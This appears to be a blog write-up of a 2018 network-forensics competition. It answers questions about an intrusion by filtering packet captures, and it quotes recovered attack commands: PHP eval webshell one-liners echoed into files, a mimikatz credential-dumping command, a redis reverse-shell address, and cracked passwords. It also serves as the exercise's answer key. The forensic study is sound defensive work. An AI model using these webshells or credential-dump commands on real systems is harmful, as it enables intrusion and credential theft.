2018.6.1 铁三数据赛 复现

链接:https://pan.baidu.com/s/1FH9R2EKwiBZKq93EjYtXdA
提取码:pkmv

1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列)  
2.两台服务器的主机名分别是什么  
3.黑客使用了什么工具对服务器1进行的攻击(小写)  
4.黑客成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)  
5.黑客向服务器1写入webshell的具体命令是什么(url解码后)  
6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)  
7.服务器1安装的修补程序名称  
8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)  
9.黑客使用什么命令或文件进行的内网扫描  
10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)  
11.黑客执行的什么命令将administrator的密码保存到文件中  
12.服务器1的系统管理员administrator的密码是什么  
13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)  
14.服务器1的mysql的root用户的密码是什么  
15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径  
16.服务器2的web网站后台账号密码(格式:账号/密码)  
17.黑客在redis未授权访问中反弹shell的ip和端口是多少  
18.黑客拿到root权限后执行的第二条命令是什么  
19.服务器2的root用户密码是什么  
20.黑客向服务器2写入webshell的命令  
21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)

1、被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序
先过滤http协议,由大量的sql注入确定
攻击者ip:202.1.1.2
服务器1 ip:192.168.1.74
攻击服务器1时,使用的工具是sqlmap


第2台服务器的ip,过滤条件:

ip.src == 192.168.1.74 && ip.dst != 202.1.1.2 && http

在第3、4个数据包里有服务器2ip:192.168.2.66
2、两台服务器的主机名分别是什么

http contains "phpinfo"

在第二、四个数据包中找到

新建html并保存
<img src="https://i.loli.net/2020/02/23/6lS5bZ9LsUQRhAn.png" width="90%" height-"90%">


同时在第一个phpinfo发现一个可疑的abc.php文件
4、黑客成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)

ip.addr == 202.1.1.2 && http.request.method == "POST"

第一个数据包没找到啥,在第2个数据包

admin/adminlwphp/WD7x

5、黑客向服务器1写入webshell的具体命令是什么(url解码后)

ip.addr == 202.1.1.2 && http

在第2个数据包,能看到命令执行

url解码后:

echo ^<?php^ eval($_POST[ge]);?^>>abc.php


明显,菜刀流量
6、服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)
端口的话,由前面phpinfo知道服务器1是windows系统,那必然会用netstat命令

(ip.addr == 202.1.1.2 || ip.addr == 192.168.1.74) && http

在第3个数据包,

对z1参数b64 decode

C:\\WWW\\my\\scan.php

10570、15846、24547序号发现黑客上传scan.php进行了内网扫描
在87722序号找到

80 135 139 445 1025 3306 3389

注册端口(RegisteredPorts):从1024到49151。

1025 3306 3389

在109123等序号都发现黑客使用mimikatz.exe
7、服务器1安装的修补程序名称
对z2参数b64 decode

cd /d "C:\WWW\"&systeminfo&echo [S]&cd&echo [E]

看到黑客执行了systeminfo

Q147222

8、网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)

9、黑客使用什么命令或文件进行的内网扫描
10、扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)

ip.addr == 202.1.1.2 || ip.addr == 192.168.1.74 && http contains "scan"


得到ip范围:192.168.1.1~192.168.3.255

80,3306,6379

3306是mysql的default port
6379是redis的default port
11、黑客执行的什么命令将administrator的密码保存到文件中
在165402序号,发现log.txt,就在附近了,对z2参数b64 decode:

cd /d "C:\WWW\my\mimi\"&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> log.txt&echo [S]&cd&echo [E]
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> log.txt

12、服务器1的系统管理员administrator的密码是什么
前面已经发现黑客使用了mimikatz工具,继续往后查找,在165846序号

Simplexue123

13、黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)
14、服务器1的mysql的root用户的密码是什么
直接搜索root

http contains "root"

在第4个数据包

windpasssql

15、黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径
shell之后的数据一般在tcp里

tcp and !(tcp.port == 80) and !(tcp.port == 443) and ip.addr == 202.1.1.2

在第5个pcap包

/etc/shadow

16、服务器2的web网站后台账号密码(格式:账号/密码)
直接搜索关键字admin

http contains "admin"

在第6个pcap包
在最后一/两条

32位长,md5在线解密

admin/112233.com

17、黑客在redis未授权访问中反弹shell的ip和端口是多少

tcp.port == 6379

202.1.1.2/6666

18、黑客拿到root权限后执行的第二条命令是什么
同15

cd /var/www/html

19、服务器2的root用户密码是什么

20、黑客向服务器2写入webshell的命令
同15

echo '<?php eval($_POST[a]);'>indexs.php

21、pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)
在第一个pcap包过滤arp协议

在6个包中都进行过滤:

arp.isgratuitous ==True

在第一、四个pcap包中有找到

192.168.3.213
192.168.3.6
192.168.3.19
posted @ 2020-02-25 11:26  Pur3  阅读(332)  评论(1编辑  收藏  举报